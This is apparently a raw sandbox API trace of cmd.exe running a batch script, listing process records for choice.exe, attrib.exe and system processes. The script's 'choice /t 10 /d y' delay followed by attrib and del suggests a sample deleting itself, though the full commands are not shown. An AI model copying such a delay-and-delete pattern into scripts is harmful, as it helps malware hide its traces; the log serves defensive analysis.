[0084.053] GetConsoleOutputCP () returned 0x1b5 [0084.053] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0084.053] GetUserDefaultLCID () returned 0x409 [0084.054] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a2f4950, cchData=8 | out: lpLCData=":") returned 2 [0084.054] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f740, cchData=128 | out: lpLCData="0") returned 2 [0084.054] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f740, cchData=128 | out: lpLCData="0") returned 2 [0084.054] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f740, cchData=128 | out: lpLCData="1") returned 2 [0084.054] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a2f4940, cchData=8 | out: lpLCData="/") returned 2 [0084.054] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a2f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0084.054] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a2f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0084.054] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a2f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0084.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a2f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0084.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a2f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0084.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a2f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0084.055] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a2f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0084.055] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a2f4930, cchData=8 | out: lpLCData=".") returned 2 [0084.055] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a2f4920, cchData=8 | out: lpLCData=",") returned 2 [0084.055] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0084.057] GetProcessHeap () returned 0x550000 [0084.057] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20c) returned 0x562eb0 [0084.057] GetConsoleTitleW (in: lpConsoleTitle=0x562eb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.057] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0084.058] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0084.058] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0084.058] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0084.058] GetProcessHeap () returned 0x550000 [0084.058] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x566360 [0084.058] GetProcessHeap () returned 0x550000 [0084.059] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566360 | out: hHeap=0x550000) returned 1 [0084.059] _wcsicmp (_String1="choice", _String2=")") returned 58 [0084.059] _wcsicmp (_String1="FOR", _String2="choice") returned 3 [0084.059] _wcsicmp (_String1="FOR/?", _String2="choice") returned 3 [0084.059] _wcsicmp (_String1="IF", _String2="choice") returned 6 [0084.059] _wcsicmp (_String1="IF/?", _String2="choice") returned 6 [0084.059] _wcsicmp (_String1="REM", _String2="choice") returned 15 [0084.059] _wcsicmp (_String1="REM/?", _String2="choice") returned 15 [0084.059] GetProcessHeap () returned 0x550000 [0084.059] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x551118 [0084.059] GetProcessHeap () returned 0x550000 [0084.059] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x16) returned 0x551178 [0084.060] GetProcessHeap () returned 0x550000 [0084.060] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x22) returned 0x551198 [0084.061] GetProcessHeap () returned 0x550000 [0084.061] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x5511c8 [0084.062] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0084.062] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0084.062] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0084.062] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0084.062] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0084.062] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0084.062] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0084.062] GetProcessHeap () returned 0x550000 [0084.062] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x551228 [0084.062] GetProcessHeap () returned 0x550000 [0084.062] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x16) returned 0x551288 [0084.064] GetProcessHeap () returned 0x550000 [0084.064] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x78) returned 0x566378 [0084.064] GetProcessHeap () returned 0x550000 [0084.064] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x5630c8 [0084.065] _wcsicmp (_String1="del", _String2=")") returned 59 [0084.065] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0084.065] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0084.065] _wcsicmp (_String1="IF", _String2="del") returned 5 [0084.065] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0084.065] _wcsicmp (_String1="REM", _String2="del") returned 14 [0084.065] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0084.065] GetProcessHeap () returned 0x550000 [0084.065] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x563128 [0084.065] GetProcessHeap () returned 0x550000 [0084.065] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x10) returned 0x560018 [0084.067] GetProcessHeap () returned 0x550000 [0084.067] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x70) returned 0x563188 [0084.068] GetConsoleTitleW (in: lpConsoleTitle=0x32f3d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.068] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0084.068] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0084.068] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0084.069] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0084.069] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0084.069] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0084.069] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0084.069] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0084.069] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0084.069] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0084.069] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0084.069] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0084.069] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0084.069] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0084.069] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0084.069] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0084.069] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0084.069] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0084.069] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0084.069] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0084.069] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0084.069] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0084.069] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0084.069] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0084.069] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0084.069] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0084.069] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0084.069] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0084.069] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0084.069] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0084.070] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0084.070] _wcsicmp (_String1="choice", _String2="START") returned -16 [0084.070] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0084.070] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0084.070] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0084.070] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0084.070] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0084.070] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0084.070] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0084.070] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0084.070] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0084.070] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0084.070] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0084.070] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0084.070] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0084.070] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0084.070] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0084.070] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0084.070] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0084.070] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0084.070] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0084.070] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0084.070] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0084.070] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0084.070] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0084.070] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0084.072] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0084.072] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0084.072] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0084.072] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0084.072] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0084.072] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0084.072] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0084.072] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0084.072] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0084.072] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0084.072] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0084.072] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0084.072] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0084.072] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0084.072] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0084.072] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0084.072] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0084.072] _wcsicmp (_String1="choice", _String2="START") returned -16 [0084.072] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0084.072] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0084.072] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0084.073] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0084.073] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0084.073] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0084.073] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0084.073] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0084.073] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0084.073] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0084.073] _wcsicmp (_String1="choice", _String2="FOR") returned -3 [0084.073] _wcsicmp (_String1="choice", _String2="IF") returned -6 [0084.073] _wcsicmp (_String1="choice", _String2="REM") returned -15 [0084.073] GetProcessHeap () returned 0x550000 [0084.073] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x563200 [0084.073] GetProcessHeap () returned 0x550000 [0084.073] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x30) returned 0x563418 [0084.073] _wcsnicmp (_String1="choi", _String2="cmd ", _MaxCount=0x4) returned -5 [0084.074] GetProcessHeap () returned 0x550000 [0084.074] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x418) returned 0x5641e0 [0084.074] SetErrorMode (uMode=0x0) returned 0x0 [0084.074] SetErrorMode (uMode=0x1) returned 0x0 [0084.074] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5641e8, lpFilePart=0x32eef4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32eef4*="Desktop") returned 0x25 [0084.074] SetErrorMode (uMode=0x0) returned 0x1 [0084.074] GetProcessHeap () returned 0x550000 [0084.074] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5641e0, Size=0x62) returned 0x5641e0 [0084.074] GetProcessHeap () returned 0x550000 [0084.074] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5641e0) returned 0x62 [0084.074] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0084.074] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0084.074] GetProcessHeap () returned 0x550000 [0084.074] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x120) returned 0x563450 [0084.074] GetProcessHeap () returned 0x550000 [0084.075] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x238) returned 0x564250 [0084.082] GetProcessHeap () returned 0x550000 [0084.082] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x564250, Size=0x122) returned 0x564250 [0084.082] GetProcessHeap () returned 0x550000 [0084.082] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x564250) returned 0x122 [0084.082] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0084.082] GetProcessHeap () returned 0x550000 [0084.082] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe0) returned 0x563578 [0084.082] GetProcessHeap () returned 0x550000 [0084.082] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x563578, Size=0x76) returned 0x563578 [0084.082] GetProcessHeap () returned 0x550000 [0084.083] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x563578) returned 0x76 [0084.084] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0084.084] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x32ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec70) returned 0xffffffff [0084.084] GetLastError () returned 0x2 [0084.084] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\choice", fInfoLevelId=0x1, lpFindFileData=0x32ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec70) returned 0xffffffff [0084.085] GetLastError () returned 0x2 [0084.085] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0084.085] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x32ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec70) returned 0x5635f8 [0084.085] GetProcessHeap () returned 0x550000 [0084.085] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x5512a8 [0084.085] FindClose (in: hFindFile=0x5635f8 | out: hFindFile=0x5635f8) returned 1 [0084.085] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.COM", fInfoLevelId=0x1, lpFindFileData=0x32ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec70) returned 0xffffffff [0084.086] GetLastError () returned 0x2 [0084.086] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.EXE", fInfoLevelId=0x1, lpFindFileData=0x32ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ec70) returned 0x5635f8 [0084.086] GetProcessHeap () returned 0x550000 [0084.086] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5512a8, Size=0x4) returned 0x5512a8 [0084.086] FindClose (in: hFindFile=0x5635f8 | out: hFindFile=0x5635f8) returned 1 [0084.086] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0084.086] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0084.086] GetConsoleTitleW (in: lpConsoleTitle=0x32f168, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0084.103] InitializeProcThreadAttributeList (in: lpAttributeList=0x32eff0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32f0b8 | out: lpAttributeList=0x32eff0, lpSize=0x32f0b8) returned 1 [0084.103] UpdateProcThreadAttribute (in: lpAttributeList=0x32eff0, dwFlags=0x0, Attribute=0x60001, lpValue=0x32f0b0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32eff0, lpPreviousValue=0x0) returned 1 [0084.103] GetStartupInfoW (in: lpStartupInfo=0x32efac | out: lpStartupInfo=0x32efac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0084.104] GetProcessHeap () returned 0x550000 [0084.104] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x18) returned 0x5635f8 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0084.105] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0084.105] GetProcessHeap () returned 0x550000 [0084.105] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5635f8 | out: hHeap=0x550000) returned 1 [0084.105] GetProcessHeap () returned 0x550000 [0084.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa) returned 0x560030 [0084.105] lstrcmpW (lpString1="\\choice.exe", lpString2="\\XCOPY.EXE") returned -1 [0084.107] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\choice.exe", lpCommandLine="choice /t 10 /d y ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x32f04c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="choice /t 10 /d y ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32f098 | out: lpCommandLine="choice /t 10 /d y ", lpProcessInformation=0x32f098*(hProcess=0x78, hThread=0x74, dwProcessId=0xa20, dwThreadId=0x9f0)) returned 1 [0084.113] CloseHandle (hObject=0x74) returned 1 [0084.113] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0084.113] GetProcessHeap () returned 0x550000 [0084.113] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565820 | out: hHeap=0x550000) returned 1 [0084.113] GetEnvironmentStringsW () returned 0x5644f0* [0084.113] GetProcessHeap () returned 0x550000 [0084.113] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb36) returned 0x565030 [0084.113] FreeEnvironmentStringsW (penv=0x5644f0) returned 1 [0084.113] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) Process: id = "29" image_name = "choice.exe" filename = "c:\\windows\\syswow64\\choice.exe" page_root = "0x39f6f000" os_pid = "0xa00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0xac8" cmd_line = "choice /t 10 /d y " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 351 os_tid = 0xa10 Process: id = "30" image_name = "choice.exe" filename = "c:\\windows\\syswow64\\choice.exe" page_root = "0x3961f000" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0xa34" cmd_line = "choice /t 10 /d y " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 352 os_tid = 0x9f0 Process: id = "31" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x38a08000" os_pid = "0x9e0" os_integrity_level = "0x4000" os_privileges = "0x60b16000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x1ac" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 354 os_tid = 0x818 Thread: id = 355 os_tid = 0x808 Thread: id = 356 os_tid = 0x634 Thread: id = 357 os_tid = 0x5cc Thread: id = 358 os_tid = 0xc4 Thread: id = 359 os_tid = 0x5e4 Thread: id = 360 os_tid = 0x5f4 Thread: id = 361 os_tid = 0xb18 Thread: id = 362 os_tid = 0x828 Process: id = "32" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x35353000" os_pid = "0x898" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k secsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\WinDefend" [0xe], "NT AUTHORITY\\Logon Session 00000000:00063d74" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 366 os_tid = 0x8dc Thread: id = 369 os_tid = 0x868 Thread: id = 370 os_tid = 0x878 Thread: id = 371 os_tid = 0x8a8 Thread: id = 377 os_tid = 0xec Thread: id = 378 os_tid = 0xa1c Thread: id = 379 os_tid = 0x25c Thread: id = 381 os_tid = 0x500 Thread: id = 382 os_tid = 0x31c Thread: id = 383 os_tid = 0xa30 Thread: id = 384 os_tid = 0xa4c Thread: id = 385 os_tid = 0xa40 Thread: id = 389 os_tid = 0x40c Process: id = "33" image_name = "attrib.exe" filename = "c:\\windows\\syswow64\\attrib.exe" page_root = "0x192b1000" os_pid = "0x640" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" 